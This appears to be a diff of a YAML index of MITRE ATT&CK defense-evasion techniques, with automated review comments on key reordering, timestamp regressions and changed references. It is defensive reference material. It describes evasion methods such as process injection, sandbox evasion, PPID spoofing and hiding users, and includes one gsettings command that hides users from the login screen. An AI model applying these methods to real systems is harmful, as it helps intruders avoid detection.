+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
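Review bot: the reference list for T1550.003 is reordered from insertion order to alphabetical by `source_name`, which again inflates the diff; the one substantive change is the GentilKiwi `Pass the ticket` citation moving to a `web.archive.org` capture with the retrieval date updated to September 12, 2024, consistent with upstream replacing a link that no longer resolved. `Deply, B.` in that citation is an upstream misspelling of Delpy that this sync reproduces; not something for this PR to change, but worth reporting upstream. `x_mitre_modified_by_ref` was removed from one position in the previous hunk and is re-added here, so that is a move as well.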
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
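Review bot: the Deloitte Environment Awareness reference now points at a Google Drive URL with an `/edit` suffix (and a September 13, 2024 retrieval date) instead of the bare share link used before; the `/edit` form is the editor view and can prompt for sign-in where the plain link renders anonymously, so check that the new URL resolves for an unauthenticated reader, or state in the PR that reference URLs are copied from upstream verbatim and not link-checked. The same substitution appears in the T1497.002 hunk further down. The rest of this hunk is relocation rather than content: `type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` move to the end of the object, `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0, and the `x_mitre_version: '1.3'` shown as context in the preceding hunk is left as is.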
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
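Review bot: `modified` moves backwards here, from 2022-05-11T14:00:00.188Z to 2022-03-11T20:38:28.802Z, and the same regression recurs through the patch (Port Knocking, Hidden Users, Impair Command History Logging, Network Provider DLL, Parent PID Spoofing, VDSO Hijacking, Services File Permissions Weakness, KernelCallbackTable, ROMMONkit, Network Share Connection Removal, Modify System Image, Indicator Removal from Tools, Resource Forking). Nearly every old value ends in `.188Z`, most at exactly `14:00:00`, which looks like a batch-assigned stamp rather than the upstream STIX `modified` value, while the replacements are all distinct, so the regression reads as a correction rather than a stale source. The PR description should still name the ATT&CK STIX bundle or release the index was regenerated from, so a reader of the history can tell which of the two sets of timestamps is authoritative.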
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
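Review bot: T1218.005 loses `x_mitre_attack_spec_version: 2.1.0` (together with `spec_version: '2.1'`) at the top of this hunk and nothing in the hunk puts a value back, whereas T1480 in the same hunk goes from 2.1.0 to 3.2.0; the same unreplaced removal happens to Port Knocking (T1205.001), KernelCallbackTable (T1574.013), ROMMONkit (T1542.004) and Modify System Image later in the patch. Confirm that those objects still carry the key outside the visible context, or that the generator now intentionally omits it for objects the upstream bundle left at 2.1.0; loading the regenerated YAML and listing technique IDs without the key is a quick check. Separately, almost all of the 68 to 72 line churn here is key reordering (`description`, `name`, `x_mitre_detection` and `kill_chain_phases` move to the top of the object, `url` and `external_id` swap places inside each reference, `x_mitre_platforms` keeps upstream order so the parent T1497 lists Windows, macOS, Linux while T1497.002 lists Linux, macOS, Windows) rather than content; emitting keys in a canonical sorted order from the generator would leave only the real changes to review, which here are `x_mitre_version` 1.1 to 1.2, the new third paragraph on user-agent filtering with its Trellix-Qakbot reference, and the spec version bump. That new paragraph describes a server-side check on the victim's User-Agent, which the unchanged `Process: Process Creation` / `Command: Command Execution` data sources and detection text will not observe; it is upstream wording, but worth knowing when this index is used to scope detections.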
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
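Review bot: this removal has to be read together with the later T1497.002 hunk, because almost everything deleted here (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is re-emitted there in a different order; the only content changes across the two are the reference ordering, the Deloitte URL gaining `/edit` with a September 13, 2024 retrieval date in place of May 18, 2021, and `x_mitre_deprecated: false` / `revoked: false` being added. A line diff hides a key that is dropped during such a move, so for objects reshuffled across two hunks a structural compare (parse the old and new YAML and diff the dicts per technique ID) is the reliable check, and it would also surface the objects elsewhere in this patch that lose `x_mitre_attack_spec_version` without a replacement.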
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
